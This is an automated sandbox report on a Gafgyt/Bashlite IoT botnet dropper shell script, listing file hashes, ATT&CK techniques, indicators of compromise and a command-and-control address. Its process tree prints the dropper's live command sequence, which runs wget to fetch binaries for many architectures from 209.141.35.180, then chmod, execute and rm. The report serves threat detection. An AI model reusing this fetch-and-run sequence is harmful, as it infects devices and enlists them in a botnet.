gafgyt | 1909a407766d028d3c093472b44aa98c9e61892d552a28cd5a4fccbc3b08f1a5

Analysis

max time kernel
144s
max time network
145s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
05/03/2025, 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TTU7Q_sex.sh
Size

1KB
MD5

a70f4bc15c5b399de5c3f066f7185973
SHA1

b901c9043ee387c820e412cf757e76a5d8ef019c
SHA256

1909a407766d028d3c093472b44aa98c9e61892d552a28cd5a4fccbc3b08f1a5
SHA512

39cd4a2de797d4b33f473ccc110e4a1fc670c3d015486572d91d73718e8a53d588b6056e28a5f0a1f78d25fa15ed9435410a57709e51f4388b50aee48f79d837

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

209.141.35.180:23

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-11.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1521	chmod
1544	chmod
1557	chmod
1562	chmod
1575	chmod
1579	chmod
1589	chmod
1526	chmod
1531	chmod
1536	chmod
1549	chmod
1570	chmod
1584	chmod

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/mips	1522	TTU7Q_sex.sh
/tmp/mipsel	1527	TTU7Q_sex.sh
/tmp/sh4	1532	TTU7Q_sex.sh
/tmp/x86	1537	TTU7Q_sex.sh
/tmp/arm61	1545	TTU7Q_sex.sh
/tmp/i686	1550	TTU7Q_sex.sh
/tmp/ppc	1558	TTU7Q_sex.sh
/tmp/586	1563	TTU7Q_sex.sh
/tmp/m68k	1571	TTU7Q_sex.sh
/tmp/dss	1580	TTU7Q_sex.sh
/tmp/co	1585	TTU7Q_sex.sh

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	x86
File opened for modification	/dev/watchdog	TTU7Q_sex.sh
File opened for modification	/dev/misc/watchdog	TTU7Q_sex.sh
File opened for modification	/dev/watchdog	x86

Changes its process name 3 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1537	x86
Changes the process name, possibly in an attempt to hide itself	1550	TTU7Q_sex.sh
Changes the process name, possibly in an attempt to hide itself	1563	TTU7Q_sex.sh

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1517	wget
1522	mips
1524	rm
1525	wget
1527	mipsel
1529	rm

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/arm61	wget
File opened for modification	/tmp/586	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/dss	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/co	wget

/tmp/TTU7Q_sex.sh
/tmp/TTU7Q_sex.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
PID:1516
- /usr/bin/wget
  wget http://209.141.35.180/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1517
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/mips
  ./mips
  2⤵
  - System Network Configuration Discovery
  PID:1522
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:1524
- /usr/bin/wget
  wget http://209.141.35.180/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1525
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/mipsel
  ./mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1527
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1529
- /usr/bin/wget
  wget http://209.141.35.180/sh4
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/sh4
  ./sh4
  2⤵
  PID:1532
- /bin/rm
  rm -rf sh4
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://209.141.35.180/x86
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/x86
  ./x86
  2⤵
  - Modifies Watchdog functionality
  - Changes its process name
  PID:1537
- /bin/rm
  rm -rf x86
  2⤵
  PID:1540
- /usr/bin/wget
  wget http://209.141.35.180/arm61
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/arm61
  ./arm61
  2⤵
  PID:1545
- /bin/rm
  rm -rf arm61
  2⤵
  PID:1547
- /usr/bin/wget
  wget http://209.141.35.180/i686
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /bin/rm
  rm -rf i686
  2⤵
  PID:1553
- /usr/bin/wget
  wget http://209.141.35.180/ppc
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /tmp/ppc
  ./ppc
  2⤵
  PID:1558
- /bin/rm
  rm -rf ppc
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://209.141.35.180/586
  2⤵
  - Writes file to tmp directory
  PID:1561
- /bin/chmod
  chmod +x 586
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /bin/rm
  rm -rf 586
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://209.141.35.180/m68k
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1570
- /tmp/m68k
  ./m68k
  2⤵
  PID:1571
- /bin/rm
  rm -rf m68k
  2⤵
  PID:1573
- /usr/bin/wget
  wget http://209.141.35.180/dc
  2⤵
  PID:1574
- /bin/chmod
  chmod +x dc
  2⤵
  - File and Directory Permissions Modification
  PID:1575
- /tmp/dc
  ./dc
  2⤵
  PID:1576
- /bin/rm
  rm -rf dc
  2⤵
  PID:1577
- /usr/bin/wget
  wget http://209.141.35.180/dss
  2⤵
  - Writes file to tmp directory
  PID:1578
- /bin/chmod
  chmod +x dss
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /tmp/dss
  ./dss
  2⤵
  PID:1580
- /bin/rm
  rm -rf dss
  2⤵
  PID:1582
- /usr/bin/wget
  wget http://209.141.35.180/co
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/chmod
  chmod +x co
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/co
  ./co
  2⤵
  PID:1585
- /bin/rm
  rm -rf co
  2⤵
  PID:1587
- /usr/bin/wget
  wget http://209.141.35.180/scar
  2⤵
  PID:1588
- /bin/chmod
  chmod +x scar
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /tmp/scar
  ./scar
  2⤵
  PID:1590
- /bin/rm
  rm -rf scar
  2⤵
  PID:1591

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/586

Filesize
107KB

MD5
cbd945f02736f58369e5663c8dfcddb5

SHA1
fdef4ac48e576f5ab21bb2673ec5243b71fb4a39

SHA256
33137b6d6deb6000816a968d6a5eb8e070c929f2eee34ac79866bbe530cac972

SHA512
36809e9a783da7ea943c7aa78705af66aa3079a4515b78c20962b9563198e8f681c5b496d794b045052a70e52a9ee0db1e4067c0ba8e16984f80ed47e8fcb7d5

Download Submit
/tmp/arm61

Filesize
174KB

MD5
a4cb6155ed165c5d932d4dbe9bc5a50d

SHA1
09702bf7cadcb03e27362e0bdfdd0fbe04733dd2

SHA256
00a780e3a5959a310ae5ce9dc9bf62c3dc13f48f313ceea6af919474bbc40da4

SHA512
5a5db33ec7fa9e7ddac30b4cdb90e3f8861239d52a4a24ff6fc666a8a1bdd1bbf2a1202c78a73493ec0feebce4f94a8e7729b0f90b0f8f18ab06818aee0e4cb8

Download Submit
/tmp/co

Filesize
174KB

MD5
ce9e1810810e6b0e239318f5dc31b25a

SHA1
ae82e3e8de8d4c4f7b8b0bca1aa983e402020ac7

SHA256
0cc8aaf9c0bc5d096bb21114a82182d61789589e3aab631dc8d63d7c45bb121f

SHA512
9e23aa32eb963c13e5db996ff58fd73a8a3c3c940d2f54f98a2cc54d698de0c53ab9f3f7efe434844b640ff6784ca3a7d7b4e4347bda26887f6eca667b6eef38

Download Submit
/tmp/dss

Filesize
135KB

MD5
e8d38bb426c35ed83435b08b8bbc3031

SHA1
f8860495f4a492d2d5618eb19e0ccf503ac06af5

SHA256
4c63bf14eacca41a2b37159c73bb5ca803e7e9751d56ceb1c48d03d73e71cb47

SHA512
a969842ad191e898295cee590f8a885d9a32437ba8498acd48249e87034d5e4ae9aab7efb1e54638c2dbf1ddc0561de52dcf3013e5d0e2b538bed01a0413ff9e

Download Submit
/tmp/i686

Filesize
111KB

MD5
86448289e8cf37e8d276bc9d78366840

SHA1
8f1bb7e55f0f0c3f4a83f424f01c02cefd74af33

SHA256
8a5698e08c15f3d2da32562290bcb2d2830be248bcb24274d82b27db3d5f22be

SHA512
44852072b6000af961138bb864060b87eb7f8540dcb1926fafa9b33ac301eae37a20f4043d7c18952db6d40a94d1747a4cbc8367101eaabc6d8203d3a3f513c8

Download Submit
/tmp/m68k

Filesize
129KB

MD5
93ba1a54db8b2690a8063b59ec637e82

SHA1
742da73044387aa1e6a5603641c09262c80e4b48

SHA256
78eb5406b17d45451494ad82527a77b54ae8d2eedbb80abf7dbab9e47d01d0e3

SHA512
a0484373cb665286d68145058e75bfd853c919e0b64a8f9851184d4934fc5f3fa5f3101a9460e5dc11f2d415730b1553c01485dd8b8af87bc911a04827745be8

Download Submit
/tmp/mips

Filesize
176KB

MD5
60b95c6a2cdb91e3f29135ea73dd706c

SHA1
70b02c3c51a2c6649612b0a449d7aadca1d4386b

SHA256
8a4d455b32113ecf68ca7c3bbd198d9bb6ef9999ec8113667dad4428a9f5dfd8

SHA512
42aa079db51620611a6afa2fb3ed59bb2636f4eb4a306a2025788e3aeea8150b1d841099603bcb5b092c99b0369375fb7a208805ac4bb6cb4793070a7e13810e

Download Submit
/tmp/mipsel

Filesize
176KB

MD5
15556d92f6eaa19c5c3ff7b7bd87ba71

SHA1
b4d4443790336c97a1b64f95342dbe3970f63d72

SHA256
99eee220442694532ee41062f78adeed9250ad80c73c9e5cc3b920ed6b57fcb9

SHA512
ce75dbade61c8ea4138e47c1399f1d27896878b9f072bec8711e086b0da194871c4710ba0ed0bfa193b5d8b3cc4aafcc13eb82ea82638ecc7e1c1150746a271d

Download Submit
/tmp/ppc

Filesize
128KB

MD5
7b69a5033e3bb132490df75c6abf00e4

SHA1
dda237281936adac28dc0eb91d7669be382615cc

SHA256
b6651d6bfd9d20de8b740946eae3f8a2f920e26d2e1fbd20c4eaf1a193888914

SHA512
26e309f7c17760d89d33e401c37d842ad9c763d4ae5eca89a3f184107801af60967391aefb7c4862f3566a89745d8022c9c20042aafd3282ec47ce14b35de4cd

Download Submit
/tmp/sh4

Filesize
123KB

MD5
b5f7048c42fff2337ff1113bb0ebab26

SHA1
d9cb4cd04fe5552a5cc24fd4ab692a37c639de08

SHA256
6b31005222142c1e07d0737b4c1e077fa45e183e68bbc8760d8dc79519ae83a8

SHA512
c939fe5031dfdbb53abae511920dc43880c8ea27274d3f8be48ef1e23e2a0d3d8f38191904b4b57d4c5c6df1c0e979a96e2ad0e4262c2253e17004a363500e5d

Download Submit
/tmp/x86

Filesize
127KB

MD5
157559a6a87caed4d380e8af1113e307

SHA1
8d017d77074584907e7121e7c531c19327b45722

SHA256
e6b7ae8be758727a77f024706803249065e2b2b112b91d43741818b7fca50096

SHA512
9a91a986908712a52fb41d69810e06bb13e950ace20466c7d929f81f7d18b66d7e415d251ccebd76bcead910e903cb9e1b23f5f55a4d6b56692e99b7552c7ced

Download Submit